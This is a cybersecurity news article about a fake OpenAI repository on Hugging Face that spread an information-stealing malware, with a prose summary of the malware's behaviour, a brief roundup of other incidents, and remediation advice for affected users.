A fake OpenAI project uploaded to AI platform Hugging Face briefly became the site’s top trending repository before researchers discovered it was secretly distributing information-stealing malware designed to target Windows users, browser credentials and cryptocurrency wallets.
The malicious repository impersonated OpenAI’s legitimate “Privacy Filter” AI model by copying its description and branding almost word-for-word, tricking developers and AI enthusiasts into downloading infected files. Researchers say the fake project reached nearly 244,000 downloads and accumulated hundreds of likes before being removed from the platform.
Cybersecurity firm HiddenLayer said the repository contained hidden malicious scripts that executed a Rust-based infostealer capable of harvesting passwords, Discord tokens, browser sessions, crypto wallet data, FileZilla credentials and sensitive files from infected systems.
How the Fake OpenAI Repository Worked
The attackers created a project called “Open-OSS/privacy-filter,” designed to closely resemble OpenAI’s real Privacy Filter release.
Users were instructed to run setup scripts such as start.bat or loader.py, which appeared to install AI dependencies but instead triggered malicious code in the background.
Researchers found the malware:
- Disabled SSL verification
- Downloaded hidden payloads remotely
- Added Microsoft Defender exclusions
- Elevated privileges through Windows prompts
- Executed a second-stage infostealer silently
The malware also included anti-analysis protections designed to evade virtual machines, debuggers and security monitoring tools.
Cryptocurrency Wallets and Browser Data Targeted
According to the investigation, the final malware payload focused heavily on credential theft and crypto-related data.
The infostealer reportedly targeted:
- Chromium and Firefox browser data
- Saved passwords and cookies
- Discord authentication tokens
- Cryptocurrency wallet extensions
- SSH, VPN and FTP credentials
- Sensitive local files and wallet seed phrases
Researchers said the stolen data was compressed and transmitted to remote command-and-control servers controlled by the attackers.
Broader AI Supply Chain Security Concerns Emerge
The incident is raising wider concerns about security risks inside the rapidly expanding open-source AI ecosystem.
HiddenLayer researchers uncovered several additional repositories using similar malicious infrastructure and noted overlaps with previous malware campaigns linked to the WinOS 4.0 and ValleyRAT malware families.
Security analysts warned that attackers are increasingly exploiting trust in AI tools, open-source repositories and developer platforms to distribute malware through what appears to be legitimate software.
Other Major Cybersecurity Threats Surface
The fake OpenAI repository appeared alongside a wave of other major cybersecurity incidents reported this week.
Security researchers disclosed three new vulnerabilities affecting cPaneland WHM systems, including flaws that could allow privilege escalation and remote code execution.
Meanwhile, the official website for open-source download manager JDownloader was reportedly compromised and used to distribute malware installers targeting Windows and Linux users.
Universities across the United States also faced disruptions after a cyberattack linked to the Canvas education platform forced several institutions to reschedule final exams.
What Users Should Do
Cybersecurity experts say anyone who downloaded files from the fake Hugging Face repository should immediately:
- Disconnect the affected system
- Change all stored passwords
- Replace crypto wallet seed phrases
- Invalidate browser sessions and tokens
- Consider fully reinstalling the operating system
Researchers warned that the attack demonstrates how AI platforms and open-source ecosystems are becoming increasingly attractive targets for sophisticated cybercriminal operations.
